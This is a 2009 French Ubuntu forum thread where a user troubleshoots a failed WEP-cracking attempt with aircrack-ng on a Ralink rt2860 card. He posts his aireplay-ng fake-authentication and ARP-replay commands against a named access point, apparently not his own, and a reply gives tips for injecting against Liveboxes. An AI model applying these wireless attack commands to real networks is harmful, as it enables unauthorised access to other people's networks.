Pages : 1
#1 Le 05/02/2009, à 19:24
- Ph3nix_
Problème d'injection de paquets carte Ralink rt2860
Bonjour,
J'aimerai essayer de cracker un wifi avec ma carte wifi Ralink rt2860.
Je tiens à préciser que c'est dans un objectif d'apprentissage que je veux cracker un wifi.
Normalement ma carte est capable de faire des injections de paquets car il éxiste des drivers dédié capable d'injecter des paquets (wildpacket) de ce chipset sous windows.
J'ai tous d'abord essayer sous ubuntu..
Sous ubuntu:
Voici le driver installé sous ubuntu:
root@Cantepie:/home/adrien# lshw -C network
*-network
description: Wireless interface
product: RaLink
vendor: RaLink
physical id: 0
bus info: pci@0000:02:00.0
logical name: ra0
version: 00
serial: 00:15:af:9e:af:32
width: 32 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=rt2860 ip=192.168.2.13 latency=0 module=rt2860sta multicast=yes wireless=RT2860 Wireless
J'ai télécharger le driver ici http://driverscollection.com/?H=RT2860& … k&SS=Linux
Ensuite j'ai suivie un tuto sur le crackage des clé wep.
--------------------------------------------------------------------------------------------------------------------------------------------------------
Premierement je ne comprends pas pourquoi avec la commande ci dessous airmon reconnait le driver rt2500 alors que j'ai bien installé le driver rt2860sta
root@Cantepie:/home/adrien/Documents/cracker_wep# airmon-ng
Interface Chipset Driver
ra0 Ralink b/g rt2500
---------------------------------------------------------------------------------------------------------------------------------------------------------
Voici le réseau wifi que je souhaite cracker
CH 1 ][ Elapsed: 2 mins ][ 2009-02-05 17:32
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:7F:AB:47:FD 0 47 1162 28 0 1 48 WEP WEP SpeedTouchC3CDE6
BSSID STATION PWR Lost Packets Probes
---------------------------------------------------------------------------------------------------------------------------------------------------------
Ensuite j'ai essayer une authentification, comme il n'y as pas de filtrage MAC j'ai mis MON adresse mac
adrien@Cantepie:~$ sudo aireplay-ng -1 0 -e SpeedTouchC3CDE6 -a 00:14:7F:AB:47:FD -h 00:15:AF:9E:AF:32 ra0
17:43:07 Waiting for beacon frame (BSSID: 00:14:7F:AB:47:FD)
17:43:07 Sending Authentication Request
17:43:09 Sending Authentication Request
17:43:11 Sending Authentication Request
17:43:13 Sending Authentication Request
17:43:15 Sending Authentication Request
17:43:17 Sending Authentication Request
17:43:19 Sending Authentication Request
Attack was unsuccessful. Possible reasons:
Mais cela a échoué pourquoi?
J'ai obtenue mon adresse mac avec la commande ifconfig
ra0 Link encap:UNSPEC HWaddr 00-15-AF-9E-AF-32-00-00-00-00-00-00-00-00-00-00
inet adr:192.168.2.13 Bcast:192.168.2.255 Masque:255.255.255.0
adr inet6: fe80::215:afff:fe9e:af32/64 Scope:Lien
UP BROADCAST RUNNING MTU:1500 Metric:1
Packets reçus:94886 erreurs:0 :0 overruns:0 frame:0
TX packets:1058 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:1000
Octets reçus:11684875 (11.1 MB) Octets transmis:144787 (141.3 KB)
Interruption:16
---------------------------------------------------------------------------------------------------------------------------------------------------------
Outre l'echec de l'authentification j'essaye maintenant de faire une attque sur le réseau:
adrien@Cantepie:~$ sudo aireplay-ng -3 -e SpeedTouchC3CDE6 -b 00:14:7F:AB:47:FD -h 00:15:AF:9E:AF:32 ra0
Saving ARP requests in replay_arp-0205-174410.cap
You should also start airodump-ng to capture replies.
Read 4357 packets (got 21 ARP requests), sent 64258 packets...(339 pps)
Voici le résultat aprés plus de 5 minutes... Pourquoi j'ai aussi peu de requete ARP recu?
---------------------------------------------------------------------------------------------------------------------------------------------------------
Même si j'ai peu de requete ARP recu et que l'attaque échoue j'essaye quand même de cracker la clé wep...
adrien@Cantepie:~$ aircrack-ng -p2 *.cap
Opening replay_arp-0205-173651.cap
Opening replay_arp-0205-173845.cap
Opening replay_arp-0205-174410.cap
Read 16 packets.
# BSSID ESSID Encryption
1 00:14:7F:AB:47:FD WEP (16 IVs)
Choosing first network as target.
Not enough IVs available. You need about 250.000 IVs to crack
40-bit WEP, and more than 800.000 IVs to crack a 104-bit key.
evidamment pas assez de paquets IVS donc le crackage est impossible....
Sous backtrack:
Mon materiel n'est même pas reconnue et je ne sais pas comment faire pour que backtrack reconnaise mon materiel? Quelqu'un connais-t-il la solution?
Sous windows vista
Je vais pas trop m'attarder dessus car c'est un forum linux.
Mais sous windows je n'arrive pas à installer le driver dédié rt2860.inf
Il me dis qu'on ne peut pas installer le pilote ainsi (en choisissant installer en clickant sur le fichier .inf)
En conclusion Pourquoi ca fouare lamentablement? Quelqu'un as-t-il déja réussi en utilisant une carte Ralink chipset rt2860 ?
Merci d'avance
Hiroshima 45 / Chernobyl 86 / Windows '95
Hors ligne
#2 Le 06/02/2009, à 00:05
- Adhémar
Re : Problème d'injection de paquets carte Ralink rt2860
Va voir directement sur le site d'aircrack, ils expliquent clairement quels cartes sont supportées, avec quels drivers.
http://www.aircrack-ng.org/doku.php
Ceci dit, il arrive que l'injection foire également à cause du point d'accès qui n'autorise pas les fausses identifications.
A+
Adhémar
Hors ligne
#3 Le 06/02/2009, à 00:10
- toutafai
Re : Problème d'injection de paquets carte Ralink rt2860
faut aussi etre associé à la borne pour pouvoir généré du trafic par injection...
pour les bornes n'autorisant pas les fausses identifications, essayer en injectant proche de la valeur max (x=1000 par exemple, cela marche très bien avec les tres répandues Livebox
Tombé dans l'informatique étant petit, j'en ai fait mon métier. Utilisateur d'Ubuntu depuis novembre 2006, actuellement sous 20.04 x64 (Que d'évolution
depuis Dapper Drake ! Ça rajeunit pas ^^^).
Hors ligne
#4 Le 08/02/2009, à 23:10
- Ph3nix_
Re : Problème d'injection de paquets carte Ralink rt2860
un copain as déja cracker ce PA. Et je sais qu'il n'y as ni filtrage des adresses ni association manuelle (avec un bouton sur la box)
tu veux dire quoi par fausse authentification?
Dernière modification par Ph3nix_ (Le 08/02/2009, à 23:12)
Hiroshima 45 / Chernobyl 86 / Windows '95
Hors ligne
Pages : 1